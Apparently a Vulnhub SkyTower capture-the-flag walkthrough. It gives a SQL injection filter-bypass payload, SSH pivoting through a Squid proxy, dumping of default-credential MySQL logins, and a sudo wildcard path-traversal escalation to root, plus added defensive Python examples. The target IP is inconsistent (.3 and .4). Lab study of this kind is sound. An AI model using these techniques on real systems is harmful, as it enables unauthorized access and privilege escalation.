Vulnhub - SkyTower Writeup
Description
Vulnhub - SkyTower. Welcome to SkyTower:1 This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”.
You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you.
We encourage you to try it out for yourself first, give yourself plenty of time and then only revert to the Walkthroughs below.
Enjoy!
Telspace Systems
@telspacesystems
Enumeration
Start by enumerating the open ports.
Nmap
Nmap scan report for skytower.com (192.168.100.3)
Host is up, received arp-response (0.00074s latency).
Scanned at 2020-05-01 10:17:16 EDT for 33s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
22/tcp filtered ssh no-response
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy syn-ack ttl 64 Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
On opening port 80 in a web browser, we are presented with a login screen.

Some initial tests show that the website is vulnerable to SQL injection.

Let’s do some additional tests using Burp Suite and see if we can bypass the login using ' OR 1=1 #.

We can see that the application is blocking some keywords like OR, AND and =.
On further inspection, we can see that the application filters out each keyword just once. We can bypass the filtering for OR by using OORR: when the system strips the OR in the middle, we are still left with the OR keyword. 1=1 can be substituted by 1<2. Our payload for login bypass will be ' OORR 1<2 #

And we have successfully bypassed the login page and are presented with some ssh credentials. However, the ssh port is filtered, so we cannot connect to it directly.
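To show the bypass from the defender's side, here is an added Python example (mine, not part of the original writeup or the SkyTower application) that emulates a single-pass keyword blacklist in front of a string-built login query, next to the parameterised query that makes the blacklist unnecessary. The table contents mirror the SkyTech login table dumped later in the writeup; the query shape and the filter are assumptions about what the application does, and MySQL's # comment is rewritten to -- so the demo runs on SQLite.

```python
import sqlite3

# Constructed sample data mirroring the SkyTech 'login' table from the writeup.
ROWS = [(1, "john@skytech.com", "hereisjohn"),
        (2, "sara@skytech.com", "ihatethisjob"),
        (3, "william@skytech.com", "senseable")]

BLOCKED = ["OR", "AND", "="]  # the keywords the writeup saw being stripped


def naive_filter(value: str) -> str:
    """Single-pass, non-recursive blacklist (assumed shape of the app's filter).
    'OORR' loses its inner 'OR' and collapses back to 'OR', so the filter is useless."""
    for kw in BLOCKED:
        value = value.replace(kw, "")
    return value


def _connect() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, email TEXT, password TEXT)")
    con.executemany("INSERT INTO login VALUES (?, ?, ?)", ROWS)
    return con


def login_vulnerable(email: str, password: str) -> bool:
    """Blacklist + string concatenation (assumed pattern of the SkyTower login)."""
    e, p = naive_filter(email), naive_filter(password)
    sql = f"SELECT id FROM login WHERE email='{e}' AND password='{p}'"
    # SQLite has no '#' line comment; rewrite it to '--' so the MySQL payload runs here.
    sql = sql.replace("#", "--")
    try:
        return _connect().execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a query the filter mangled is just a failed login


def login_safe(email: str, password: str) -> bool:
    """Parameterised query: input stays data, never SQL syntax, so no blacklist is needed.
    (Storing plaintext passwords, as this table does, is a separate problem.)"""
    row = _connect().execute(
        "SELECT id FROM login WHERE email=? AND password=?", (email, password)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "' OORR 1<2 #"
    print(naive_filter(payload))           # ' OR 1<2 #
    print(login_vulnerable(payload, "x"))  # True
    print(login_safe(payload, "x"))        # False
```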
Low Shell
Proxychains
There is a Squid proxy running on port 3128. We can try routing our ssh traffic through it.
Add the Squid proxy to the proxychains config file.
kali@kali:~$ tail /etc/proxychains.conf
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 192.168.100.4 3128
Connect to ssh via proxy.
kali@kali:~$ proxychains ssh john@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
john@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:15:58 2020 from 192.168.100.3
Funds have been withdrawn
Connection to 192.168.100.4 closed.
We successfully connected to ssh, but we are immediately kicked off after the message Funds have been withdrawn is printed.
This is probably because of an entry in the .bashrc file. We can get a shell by appending /bin/bash to the end of the ssh command, so that our command is executed before we are kicked out. Rename the .bashrc file after getting the shell and then log in again.
kali@kali:~$ proxychains ssh john@192.168.100.3 /bin/bash
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
john@192.168.100.3 password:
ls
id
uid=1000(john) gid=1000(john) groups=1000(john)
ls -la
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile
mv ./.bashrc bashrc
Log in again as john.
kali@kali:~$ proxychains ssh john@192.168.100.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
john@192.168.100.3's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:11:39 2020 from 192.168.100.3
john@SkyTower:~$ id
uid=1000(john) gid=1000(john) groups=1000(john)
john@SkyTower:~$
Privilege Escalation
Download a Linux enumeration script to the system and run it to probe for weaknesses.
MySQL
The script found that MySQL has the default credentials root/root. Log in to MySQL and dump the database.
john@SkyTower:~$ mysql -h localhost -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 5.5.35-0+wheezy1 (Debian)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| SkyTech |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)
mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)
We have some credentials here. Let’s see if we can ssh using these.
kali@kali:~$ proxychains ssh sara@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
sara@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 7 01:03:28 2020 from 192.168.100.4
Funds have been withdrawn
Connection to 192.168.100.4 closed.
We can, but we are kicked out after login. Do the same as we did for john with the .bashrc file and log in again.
kali@kali:~$ proxychains ssh sara@192.168.100.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.4:3128-<><>-192.168.100.4:22-<><>-OK
sara@192.168.100.4's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 6 23:36:02 2020 from 192.168.100.3
sara@SkyTower:~$ id
uid=1001(sara) gid=1001(sara) groups=1001(sara)
sara@SkyTower:~$
Check if the user has any sudo permissions.
sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$
We can run sudo /bin/cat /accounts/* and sudo /bin/ls /accounts/*. But how can we escalate privileges using these? All we can do is view the files in the /accounts/ folder, and there is nothing in it.
After racking my brain for some time, I found a rather simple solution. According to the sudo rule, our command only needs to start with sudo /bin/ls /accounts/*. What happens if we try navigating to other folders using ../?
sara@SkyTower:/accounts$ sudo /bin/ls /accounts/../
accounts bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz
sara@SkyTower:/accounts$ sudo /bin/ls /accounts/../root/
flag.txt
sara@SkyTower:/accounts$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
It works, and the root password is in there.
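The rule works against sara because sudoers matches command arguments with shell-style globbing, in which * also matches / and .., so /accounts/../root/flag.txt satisfies /accounts/*. The added Python example below (mine, not from the writeup) reproduces that matching with fnmatch and shows the check a wrapper script should perform instead of a wildcard cat: canonicalise the path and require it to stay under /accounts; the wrapper name is an assumption.

```python
import fnmatch
import os

ACCOUNTS_DIR = "/accounts"


def sudoers_arg_matches(rule_pattern: str, argument: str) -> bool:
    """sudoers compares command arguments with fnmatch(3)-style globbing.
    '*' is not path-aware: it matches '/' and '..' too, so the SkyTower rule
    '/bin/cat /accounts/*' also permits '/bin/cat /accounts/../root/flag.txt'."""
    return fnmatch.fnmatchcase(argument, rule_pattern)


def is_within_accounts(path: str) -> bool:
    """Hardened check for a wrapper script (hypothetical /usr/local/bin/show-account)
    that sudo would allow instead of cat with a wildcard: canonicalise the path
    (collapsing '..' and following symlinks) and require it to stay under /accounts."""
    real = os.path.realpath(path)
    return real == ACCOUNTS_DIR or real.startswith(ACCOUNTS_DIR + os.sep)


def audit(rule_pattern: str, candidates: list) -> list:
    """Return the arguments the glob rule accepts but the path check rejects:
    exactly the escapes a wildcard sudoers rule leaks."""
    return [c for c in candidates
            if sudoers_arg_matches(rule_pattern, c) and not is_within_accounts(c)]


if __name__ == "__main__":
    # Constructed sample arguments: one legitimate file plus the two traversals from the writeup.
    tests = ["/accounts/sara.txt", "/accounts/../", "/accounts/../root/flag.txt"]
    print(audit("/accounts/*", tests))  # ['/accounts/../', '/accounts/../root/flag.txt']
```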
Root Shell
Log in using the credentials we got from the flag file.
kali@kali:~$ proxychains ssh root@192.168.100.3
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.100.3:3128-<><>-192.168.100.3:22-<><>-OK
root@192.168.100.3's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 09:01:28 2014
root@SkyTower:~# ud
-bash: ud: command not found
root@SkyTower:~# id
uid=0(root) gid=0(root) groups=0(root)
root@SkyTower:~# cat /root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
root@SkyTower:~#
And we are root.
